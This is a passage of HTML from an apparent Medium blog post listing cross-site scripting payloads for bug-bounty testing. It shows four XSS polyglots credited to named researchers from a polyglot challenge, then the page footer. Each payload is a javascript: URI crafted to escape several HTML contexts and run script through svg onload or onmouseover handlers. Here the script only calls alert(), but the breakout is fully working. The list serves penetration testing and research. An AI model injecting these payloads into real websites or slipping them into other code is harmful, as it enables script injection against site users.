\u003c\/strong\u003e\u003ca class=\"af ow\" href=\"http:\/\/polyglot.innerht.ml\" rel=\"noopener ugc nofollow\" target=\"_blank\"\u003e\u003cstrong class=\"nk gv\"\u003e@filedescriptor’s Polyglot Challenge\u003c\/strong\u003e\u003c\/a\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"3b0d\" class=\"oq mh gu om b ij or os l ot ou\"\u003e# by crlf\u003cbr\u003ejavascript:\"\/*'\/*`\/*--\u0026gt;\u0026lt;\/noscript\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/template\u0026gt;\u0026lt;\/noembed\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;html \\\" onmouseover=\/*\u0026amp;lt;svg\/*\/onload=alert()\/\/\u0026gt;\u003c\/span\u003e\u003cspan id=\"9f09\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e# by europa\u003cbr\u003ejavascript:\"\/*'\/*`\/*\\\" \/*\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/noscript\u0026gt;\u0026lt;\/noembed\u0026gt;\u0026lt;\/template\u0026gt;\u0026lt;\/script\/--\u0026gt;\u0026amp;lt;svg\/onload=\/*\u0026lt;html\/*\/onmouseover=alert()\/\/\u0026gt;\u003c\/span\u003e\u003cspan id=\"6a4c\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e# by EdOverflow\u003cbr\u003ejavascript:\"\/*\\\"\/*`\/*' \/*\u0026lt;\/template\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/noembed\u0026gt;\u0026lt;\/noscript\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/script\u0026gt;--\u0026gt;\u0026amp;lt;svg onload=\/*\u0026lt;html\/*\/onmouseover=alert()\/\/\u0026gt;\u003c\/span\u003e\u003cspan id=\"9ee2\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e# by h1\/ragnar\u003cbr\u003ejavascript:`\/\/\"\/\/\\\"\/\/\u0026lt;\/title\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/noscript\u0026gt;\u0026lt;\/noembed\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/template\u0026gt;\u0026amp;lt;svg\/onload='\/*--\u0026gt;\u0026lt;html *\/ onmouseover=alert()\/\/'\u0026gt;`\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"ba14\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003e\u003cem class=\"gu\"\u003eThank you for watching and How did you like this blog ? Tell me in the comment box.\u003c\/em\u003e\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/section\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/article\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"ab cb\"\u003e\u003cdiv class=\"ci bh fz ga gb gc\"\u003e\u003cdiv class=\"ox oy ab iv\"\u003e\n\u003cdiv class=\"oz ab\"\u003e\u003ca class=\"pa ay am ao\" href=\"https:\/\/medium.com\/tag\/xss-attack?source=post_page-----6a492d795c0---------------xss_attack-----------------\" rel=\"noopener follow\"\u003e\u003cdiv class=\"pb fj cx pc ge pd pe bf b bg z bk pf\"\u003eXss Attack\u003c\/div\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"oz ab\"\u003e\u003ca class=\"pa ay am ao\" href=\"https:\/\/medium.com\/tag\/payload?source=post_page-----6a492d795c0---------------payload-----------------\" rel=\"noopener follow\"\u003e\u003cdiv class=\"pb fj cx pc ge pd pe bf b bg z bk pf\"\u003ePayload\u003c\/div\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"oz ab\"\u003e\u003ca class=\"pa ay am ao\" href=\"https:\/\/medium.com\/tag\/bugsbounty?source=post_page-----6a492d795c0---------------bugsbounty-----------------\" rel=\"noopener follow\"\u003e\u003cdiv class=\"pb fj cx pc ge pd pe bf b bg z bk pf\"\u003eBugsbounty\u003c\/div\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"oz ab\"\u003e\u003ca class=\"pa ay am ao\" href=\"https:\/\/medium.com\/tag\/hackerrank?source=post_page-----6a492d795c0---------------hackerrank-----------------\" rel=\"noopener follow\"\u003e\u003cdiv class=\"pb fj cx pc ge pd pe bf b bg z bk pf\"\u003eHackerrank\u003c\/div\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"oz ab\"\u003e\u003ca class=\"pa ay am ao\" href=\"https:\/\/medium.com\/tag\/androx47?source=post_page-----6a492d795c0---------------androx47-----------------\" rel=\"noopener follow\"\u003e\u003cdiv class=\"pb fj cx pc ge pd pe bf b bg z bk pf\"\u003eAndrox47\u003c\/div\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"l\"\u003e\u003c\/div\u003e\n\u003cfooter class=\"pg ph pi pj pk pl pm pn po ab q pp pq c\"\u003e\u003cdiv class=\"l ae\"\u003e\u003cdiv class=\"ab cb\"\u003e\u003cdiv class=\"ci bh fz ga gb gc\"\u003e\u003cdiv class=\"ab cp pr\"\u003e\n\u003cdiv class=\"ab q ke\"\u003e\n\u003cdiv class=\"ps l\"\u003e\n\u003cspan class=\"l pt pu pv e d\"\u003e\u003cdiv class=\"ab q ke kf\"\u003e\n\u003cdiv class=\"pw-multi-vote-icon fj kg kh ki kj\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" data-testid=\"footerClapButton\" href=\"https:\/\/medium.com\/m\/signin?actionUrl=https%3A%2F%2Fmedium.com%2F_%2Fvote%2Fp%2F6a492d795c0\u0026amp;operation=register\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;user=Pintu+Solanki\u0026amp;userId=6a7d492724f5\u0026amp;source=-----6a492d795c0---------------------clap_footer-----------\" rel=\"noopener follow\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cdiv class=\"kk ao kl km kn ko am kp kq kr kj\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" viewbox=\"0 0 24 24\" aria-label=\"clap\"\u003e\u003cpath fill-rule=\"evenodd\" d=\"M11.37.828 12 3.282l.63-2.454zM13.916 3.953l1.523-2.112-1.184-.39zM8.589 1.84l1.522 2.112-.337-2.501zM18.523 18.92c-.86.86-1.75 1.246-2.62 1.33a6 6 0 0 0 .407-.372c2.388-2.389 2.86-4.951 1.399-7.623l-.912-1.603-.79-1.672c-.26-.56-.194-.98.203-1.288a.7.7 0 0 1 .546-.132c.283.046.546.231.728.5l2.363 4.157c.976 1.624 1.141 4.237-1.324 6.702m-10.999-.438L3.37 14.328a.828.828 0 0 1 .585-1.408.83.83 0 0 1 .585.242l2.158 2.157a.365.365 0 0 0 .516-.516l-2.157-2.158-1.449-1.449a.826.826 0 0 1 1.167-1.17l3.438 3.44a.363.363 0 0 0 .516 0 .364.364 0 0 0 0-.516L5.293 9.513l-.97-.97a.826.826 0 0 1 0-1.166.84.84 0 0 1 1.167 0l.97.968 3.437 3.436a.36.36 0 0 0 .517 0 .366.366 0 0 0 0-.516L6.977 7.83a.82.82 0 0 1-.241-.584.82.82 0 0 1 .824-.826c.219 0 .43.087.584.242l5.787 5.787a.366.366 0 0 0 .587-.415l-1.117-2.363c-.26-.56-.194-.98.204-1.289a.7.7 0 0 1 .546-.132c.283.046.545.232.727.501l2.193 3.86c1.302 2.38.883 4.59-1.277 6.75-1.156 1.156-2.602 1.627-4.19 1.367-1.418-.236-2.866-1.033-4.079-2.246M10.75 5.971l2.12 2.12c-.41.502-.465 1.17-.128 1.89l.22.465-3.523-3.523a.8.8 0 0 1-.097-.368c0-.22.086-.428.241-.584a.847.847 0 0 1 1.167 0m7.355 1.705c-.31-.461-.746-.758-1.23-.837a1.44 1.44 0 0 0-1.11.275c-.312.24-.505.543-.59.881a1.74 1.74 0 0 0-.906-.465 1.47 1.47 0 0 0-.82.106l-2.182-2.182a1.56 1.56 0 0 0-2.2 0 1.54 1.54 0 0 0-.396.701 1.56 1.56 0 0 0-2.21-.01 1.55 1.55 0 0 0-.416.753c-.624-.624-1.649-.624-2.237-.037a1.557 1.557 0 0 0 0 2.2c-.239.1-.501.238-.715.453a1.56 1.56 0 0 0 0 2.2l.516.515a1.556 1.556 0 0 0-.753 2.615L7.01 19c1.32 1.319 2.909 2.189 4.475 2.449q.482.08.971.08c.85 0 1.653-.198 2.393-.579.231.033.46.054.686.054 1.266 0 2.457-.52 3.505-1.567 2.763-2.763 2.552-5.734 1.439-7.586z\" clip-rule=\"evenodd\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/a\u003e\u003c\/span\u003e\u003c\/div\u003e\n\u003cdiv class=\"pw-multi-vote-count l ks kt ku kv kw kx ky\"\u003e\u003cp class=\"bf b dv z du\"\u003e\u003cspan class=\"kz\"\u003e--\u003c\/span\u003e\u003c\/p\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/span\u003e\u003cspan class=\"l h g f pw px\"\u003e\u003cdiv class=\"ab q ke kf\"\u003e\n\u003cdiv class=\"pw-multi-vote-icon fj kg kh ki kj\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" data-testid=\"footerClapButton\" href=\"https:\/\/medium.com\/m\/signin?actionUrl=https%3A%2F%2Fmedium.com%2F_%2Fvote%2Fp%2F6a492d795c0\u0026amp;operation=register\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;user=Pintu+Solanki\u0026amp;userId=6a7d492724f5\u0026amp;source=-----6a492d795c0---------------------clap_footer-----------\" rel=\"noopener follow\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cdiv class=\"kk ao kl km kn ko am kp kq kr kj\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" viewbox=\"0 0 24 24\" aria-label=\"clap\"\u003e\u003cpath fill-rule=\"evenodd\" d=\"M11.37.828 12 3.282l.63-2.454zM13.916 3.953l1.523-2.112-1.184-.39zM8.589 1.84l1.522 2.112-.337-2.501zM18.523 18.92c-.86.86-1.75 1.246-2.62 1.33a6 6 0 0 0 .407-.372c2.388-2.389 2.86-4.951 1.399-7.623l-.912-1.603-.79-1.672c-.26-.56-.194-.98.203-1.288a.7.7 0 0 1 .546-.132c.283.046.546.231.728.5l2.363 4.157c.976 1.624 1.141 4.237-1.324 6.702m-10.999-.438L3.37 14.328a.828.828 0 0 1 .585-1.408.83.83 0 0 1 .585.242l2.158 2.157a.365.365 0 0 0 .516-.516l-2.157-2.158-1.449-1.449a.826.826 0 0 1 1.167-1.17l3.438 3.44a.363.363 0 0 0 .516 0 .364.364 0 0 0 0-.516L5.293 9.513l-.97-.97a.826.826 0 0 1 0-1.166.84.84 0 0 1 1.167 0l.97.968 3.437 3.436a.36.36 0 0 0 .517 0 .366.366 0 0 0 0-.516L6.977 7.83a.82.82 0 0 1-.241-.584.82.82 0 0 1 .824-.826c.219 0 .43.087.584.242l5.787 5.787a.366.366 0 0 0 .587-.415l-1.117-2.363c-.26-.56-.194-.98.204-1.289a.7.7 0 0 1 .546-.132c.283.046.545.232.727.501l2.193 3.86c1.302 2.38.883 4.59-1.277 6.75-1.156 1.156-2.602 1.627-4.19 1.367-1.418-.236-2.866-1.033-4.079-2.246M10.75 5.971l2.12 2.12c-.41.502-.465 1.17-.128 1.89l.22.465-3.523-3.523a.8.8 0 0 1-.097-.368c0-.22.086-.428.241-.584a.847.847 0 0 1 1.167 0m7.355 1.705c-.31-.461-.746-.758-1.23-.837a1.44 1.44 0 0 0-1.11.275c-.312.24-.505.543-.59.881a1.74 1.74 0 0 0-.906-.465 1.47 1.47 0 0 0-.82.106l-2.182-2.182a1.56 1.56 0 0 0-2.2 0 1.54 1.54 0 0 0-.396.701 1.56 1.56 0 0 0-2.21-.01 1.55 1.55 0 0 0-.416.753c-.624-.624-1.649-.624-2.237-.037a1.557 1.557 0 0 0 0 2.2c-.239.1-.501.238-.715.453a1.56 1.56 0 0 0 0 2.2l.516.515a1.556 1.556 0 0 0-.753 2.615L7.01 19c1.32 1.319 2.909 2.189 4.475 2.449q.482.08.971.08c.85 0 1.653-.198 2.393-.579.231.033.46.054.686.054 1.266 0 2.457-.52 3.505-1.567 2.763-2.763 2.552-5.734 1.439-7.586z\" clip-rule=\"evenodd\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/a\u003e\u003c\/span\u003e\u003c\/div\u003e\n\u003cdiv class=\"pw-multi-vote-count l ks kt ku kv kw kx ky\"\u003e\u003cp class=\"bf b dv z du\"\u003e\u003cspan class=\"kz\"\u003e--\u003c\/span\u003e\u003c\/p\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/span\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"bq ab\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cbutton class=\"ao kk la lb ab q fk lc ld\" aria-label=\"responses\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" viewbox=\"0 0 24 24\" class=\"le\"\u003e\u003cpath d=\"M18.006 16.803c1.533-1.456 2.234-3.325 2.234-5.321C20.24 7.357 16.709 4 12.191 4S4 7.357 4 11.482c0 4.126 3.674 7.482 8.191 7.482.817 0 1.622-.111 2.393-.327.231.2.48.391.744.559 1.06.693 2.203 1.044 3.399 1.044.224-.008.4-.112.486-.287a.49.49 0 0 0-.042-.518c-.495-.67-.845-1.364-1.04-2.057a4 4 0 0 1-.125-.598zm-3.122 1.055-.067-.223-.315.096a8 8 0 0 1-2.311.338c-4.023 0-7.292-2.955-7.292-6.587 0-3.633 3.269-6.588 7.292-6.588 4.014 0 7.112 2.958 7.112 6.593 0 1.794-.608 3.469-2.027 4.72l-.195.168v.255c0 .056 0 .151.016.295.025.231.081.478.154.733.154.558.398 1.117.722 1.659a5.3 5.3 0 0 1-2.165-.845c-.276-.176-.714-.383-.941-.59z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/button\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"ab q\"\u003e\n\u003cdiv class=\"py l is\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" data-testid=\"footerBookmarkButton\" href=\"https:\/\/medium.com\/m\/signin?actionUrl=https%3A%2F%2Fmedium.com%2F_%2Fbookmark%2Fp%2F6a492d795c0\u0026amp;operation=register\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;source=--------------------------bookmark_footer-----------\" rel=\"noopener follow\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"25\" height=\"25\" fill=\"none\" viewbox=\"0 0 25 25\" class=\"du lg\" aria-label=\"Add to list bookmark button\"\u003e\u003cpath fill=\"currentColor\" d=\"M18 2.5a.5.5 0 0 1 1 0V5h2.5a.5.5 0 0 1 0 1H19v2.5a.5.5 0 1 1-1 0V6h-2.5a.5.5 0 0 1 0-1H18zM7 7a1 1 0 0 1 1-1h3.5a.5.5 0 0 0 0-1H8a2 2 0 0 0-2 2v14a.5.5 0 0 0 .805.396L12.5 17l5.695 4.396A.5.5 0 0 0 19 21v-8.5a.5.5 0 0 0-1 0v7.485l-5.195-4.012a.5.5 0 0 0-.61 0L7 19.985z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/a\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"py l is\"\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\" aria-describedby=\"postFooterSocialMenu\" aria-labelledby=\"postFooterSocialMenu\"\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cbutton aria-controls=\"postFooterSocialMenu\" aria-expanded=\"false\" aria-label=\"Share Post\" data-testid=\"footerSocialShareButton\" class=\"af fk ah ai aj ak al lo an ao ap ex lp lq ld lr\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"24\" height=\"24\" fill=\"none\" viewbox=\"0 0 24 24\"\u003e\u003cpath fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M15.218 4.931a.4.4 0 0 1-.118.132l.012.006a.45.45 0 0 1-.292.074.5.5 0 0 1-.3-.13l-2.02-2.02v7.07c0 .28-.23.5-.5.5s-.5-.22-.5-.5v-7.04l-2 2a.45.45 0 0 1-.57.04h-.02a.4.4 0 0 1-.16-.3.4.4 0 0 1 .1-.32l2.8-2.8a.5.5 0 0 1 .7 0l2.8 2.79a.42.42 0 0 1 .068.498m-.106.138.008.004v-.01zM16 7.063h1.5a2 2 0 0 1 2 2v10a2 2 0 0 1-2 2h-11c-1.1 0-2-.9-2-2v-10a2 2 0 0 1 2-2H8a.5.5 0 0 1 .35.15.5.5 0 0 1 .15.35.5.5 0 0 1-.15.35.5.5 0 0 1-.35.15H6.4c-.5 0-.9.4-.9.9v10.2a.9.9 0 0 0 .9.9h11.2c.5 0 .9-.4.9-.9v-10.2c0-.5-.4-.9-.9-.9H16a.5.5 0 0 1 0-1\" clip-rule=\"evenodd\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/button\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/footer\u003e\u003cdiv class=\"pz qa qb qc qd l bx\"\u003e\n\u003cdiv class=\"ab cb\"\u003e\u003cdiv class=\"ci bh fz ga gb gc\"\u003e\n\u003cdiv class=\"cl ab qe cp\"\u003e\n\u003cdiv class=\"ab ia\"\u003e\u003ca rel=\"noopener follow\" href=\"\/?source=post_page-----6a492d795c0--------------------------------\"\u003e\u003cdiv class=\"l qf qg by qh ie\"\u003e\u003cdiv class=\"l fj\"\u003e\n\u003cimg alt=\"Pintu Solanki\" class=\"l fd by qi qj cx\" src=\"https:\/\/miro.medium.com\/v2\/resize:fill:144:144\/1*XmnNMYitXeyQnWuG-Yv_xQ.jpeg\" width=\"72\" height=\"72\" loading=\"lazy\"\u003e\u003cdiv class=\"if by l qi qj fs n ig ft\"\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"j i d\"\u003e\u003cdiv class=\"ab\"\u003e\n\u003cspan\u003e\u003cbutton class=\"bf b bg z ep pb eq er es et eu ev ew ex ey ez fa au fb fc fd bm fe ff\"\u003eFollow\u003c\/button\u003e\u003c\/span\u003e\u003cdiv class=\"dt l\"\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cdiv class=\"l\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/medium.com\/m\/signin?actionUrl=%2F_%2Fapi%2Fsubscriptions%2Fnewsletters%2Ffa795b48caf5\u0026amp;operation=register\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;newsletterV3=6a7d492724f5\u0026amp;newsletterV3Id=fa795b48caf5\u0026amp;user=Pintu+Solanki\u0026amp;userId=6a7d492724f5\u0026amp;source=-----6a492d795c0---------------------subscribe_user-----------\" rel=\"noopener follow\"\u003e\u003cbutton class=\"bf b bg z qn am qo op qp qq qr qs qt qu ew ex ey ez fa fb fc fd bm fe ff\" aria-label=\"Subscribe\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"38\" height=\"38\" fill=\"none\" viewbox=\"0 0 38 38\" class=\"qk ql qm\"\u003e\u003crect width=\"0.5\" height=\"6.5\" x=\"26.25\" y=\"9.25\" rx=\"0.25\"\u003e\u003c\/rect\u003e\u003crect width=\"0.5\" height=\"6.5\" x=\"29.75\" y=\"12.25\" rx=\"0.25\" transform=\"rotate(90 29.75 12.25)\"\u003e\u003c\/rect\u003e\u003cpath d=\"M19.5 12.5h-7a1 1 0 0 0-1 1v11a1 1 0 0 0 1 1h13a1 1 0 0 0 1-1v-5\"\u003e\u003c\/path\u003e\u003cpath d=\"M11.5 14.5 19 20l4-3\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/button\u003e\u003c\/a\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"ab cn cp\"\u003e\n\u003cdiv class=\"l\"\u003e\n\u003cdiv class=\"ab q\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at ab q\" rel=\"noopener follow\" href=\"\/?source=post_page-----6a492d795c0--------------------------------\"\u003e\u003ch2 class=\"pw-author-name bf qv qw qx qy bk\"\u003e\u003cspan class=\"gn ix\"\u003eWritten by \u003c!-- --\u003ePintu Solanki\u003c\/span\u003e\u003c\/h2\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"oz ab\"\u003e\u003cdiv class=\"l is\"\u003e\u003cspan class=\"pw-follower-count bf b bg z bk\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar il\" rel=\"noopener follow\" href=\"\/followers?source=post_page-----6a492d795c0--------------------------------\"\u003e92 Followers\u003c\/a\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"qz l\"\u003e\u003cp class=\"bf b bg z bk\"\u003e\u003cspan class=\"gn\"\u003eWith the new day comes new strength and new thoughts.\u003c\/span\u003e\u003c\/p\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"h k\"\u003e\u003cdiv class=\"ab\"\u003e\n\u003cspan\u003e\u003cbutton class=\"bf b bg z ep pb eq er es et eu ev ew ex ey ez fa au fb fc fd bm fe ff\"\u003eFollow\u003c\/button\u003e\u003c\/span\u003e\u003cdiv class=\"dt l\"\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv class=\"bm\" aria-hidden=\"false\"\u003e\u003cdiv class=\"l\"\u003e\u003cspan\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/medium.com\/m\/signin?actionUrl=%2F_%2Fapi%2Fsubscriptions%2Fnewsletters%2Ffa795b48caf5\u0026amp;operation=register\u0026amp;redirect=https%3A%2F%2Fandrox47.medium.com%2Fcross-site-scripting-xss-payloads-6a492d795c0\u0026amp;newsletterV3=6a7d492724f5\u0026amp;newsletterV3Id=fa795b48caf5\u0026amp;user=Pintu+Solanki\u0026amp;userId=6a7d492724f5\u0026amp;source=-----6a492d795c0---------------------subscribe_user-----------\" rel=\"noopener follow\"\u003e\u003cbutton class=\"bf b bg z qn am qo op qp qq qr qs qt qu ew ex ey ez fa fb fc fd bm fe ff\" aria-label=\"Subscribe\"\u003e\u003csvg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"38\" height=\"38\" fill=\"none\" viewbox=\"0 0 38 38\" class=\"qk ql qm\"\u003e\u003crect width=\"0.5\" height=\"6.5\" x=\"26.25\" y=\"9.25\" rx=\"0.25\"\u003e\u003c\/rect\u003e\u003crect width=\"0.5\" height=\"6.5\" x=\"29.75\" y=\"12.25\" rx=\"0.25\" transform=\"rotate(90 29.75 12.25)\"\u003e\u003c\/rect\u003e\u003cpath d=\"M19.5 12.5h-7a1 1 0 0 0-1 1v11a1 1 0 0 0 1 1h13a1 1 0 0 0 1-1v-5\"\u003e\u003c\/path\u003e\u003cpath d=\"M11.5 14.5 19 20l4-3\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/button\u003e\u003c\/a\u003e\u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003cdiv class=\"ra bh rb rc rd re rf rg\"\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\n\u003cdiv class=\"h k j\"\u003e\n\u003cdiv class=\"ra bh rb rh\"\u003e\u003c\/div\u003e\n\u003cdiv class=\"ab cb\"\u003e\u003cdiv class=\"ci bh fz ga gb gc\"\u003e\u003cdiv class=\"ri ab ke iv\"\u003e\n\u003cdiv class=\"rj rk l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/help.medium.com\/hc\/en-us?source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003eHelp\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"rj rk l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/medium.statuspage.io\/?source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003eStatus\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"rj rk l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/medium.com\/about?autoplay=1\u0026amp;source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003eAbout\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"rj rk l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/medium.com\/jobs-at-medium\/work-at-medium-959d1a85284e?source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003eCareers\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"rj rk l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"pressinquiries@medium.com?source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003ePress\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"rj rk l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/blog.medium.com\/?source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003eBlog\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"rj rk l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/policy.medium.com\/medium-privacy-policy-f03bf92035c9?source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003ePrivacy\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"rj rk l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/policy.medium.com\/medium-terms-of-service-9db0094a1e0f?source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003eTerms\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"rj rk l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/speechify.com\/medium?source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003eText to speech\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003cdiv class=\"rj l\"\u003e\u003ca class=\"af ag ah ai aj ak al am an ao ap aq ar as at\" href=\"https:\/\/medium.com\/business?source=post_page-----6a492d795c0--------------------------------\" rel=\"noopener follow\"\u003e\u003cp class=\"bf b dv z du\"\u003eTeams\u003c\/p\u003e\u003c\/a\u003e\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\n\u003c\/div\u003e\u003c\/div\u003e\u003cscript\u003ewindow.__BUILD_ID__=\"main-20240904-210155-4f1a2e4d5e\"\u003c\/script\u003e\u003cscript\u003ewindow.__GRAPHQL_URI__ = 